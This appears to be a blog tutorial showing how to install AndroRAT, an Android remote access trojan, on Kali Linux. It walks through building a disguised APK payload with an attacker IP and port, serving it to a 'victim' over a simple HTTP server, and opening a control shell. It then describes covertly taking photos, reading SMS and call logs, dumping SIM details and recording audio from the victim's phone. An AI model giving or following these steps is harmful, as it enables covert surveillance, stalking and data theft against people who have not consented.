Hey guys, the article is going to be interesting because in this tutorial we will present you such a (RAT) remote administration tool with the help of which you can easily control someone else’s android smartphone. We think it does not require any other tools that’s why you can control this through third party applications such as termux etc.
Lets install this tool 🙂 !!
As we have already told you that you can control this tool from android application but in our case we we’ll choose kali linux operating system. Now first of all we will download this tool using git command from github and then go to the directory. We already have the “pip” tool installed, hence we will execute the last command to setup it successfully.
git clone https://github.com/karma9874/AndroRAT.git
pip install colorama
If you are stuck somewhere, you can use the help command to check for missing arguments or attributes.
python3 androRAT.py --help
Now we will try our first and try to create the payload using the following command. But change “-i” and “-p” according to yourself.
python3 androRAT.py --build -i 192.168.1.10 -p 4444 -o security.apk
As you can see our payload is successfully created without any errors, as well as we take the help of python file service to share our payload with the victim.
python -m SimpleHTTPServer
Now everything is done from the attacking side and as soon as the victim opens the payload they will look like the image below. But it’s an truely undetectable payload.
It’s time to take control of the victim smartphone and for this purposes we have to execute the following command. But change “-i” and “-p” according to you.
python3 androRAT.py --shell -i 192.168.1.10 -p 4444
As you can see that we have successfully connected to the victim smartphone. But if you have no idea how to control the victim’s smartphone then use the help command.
You can check the information of the victim android device by executing the following command.
The following command will ask you from which camera you want to take a picture from the victim’s phone.
As you can see the picture has been successfully clicked from the victim’s phone without her knowledge.
Similarly you can get all the SMS stored on the victim’s phone by executing the following command.
The results are in front of you.
As a most useful feature for forensic investigator, through this facilities we can dump the complete details related to the SIM card.
IP and Mac Address
As you can see that we got the IP and MAC address of the victim phone.
We started audio some time ago and now we execute the follow command to stop the audio recording.
As you can see we have listened to the victim in about 3:34 minutes.
This is the most useful feature of this tool, through which we can get all previous call log details from the victim phone.
Done 🙂 !! You can go to that location and open all the received files.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.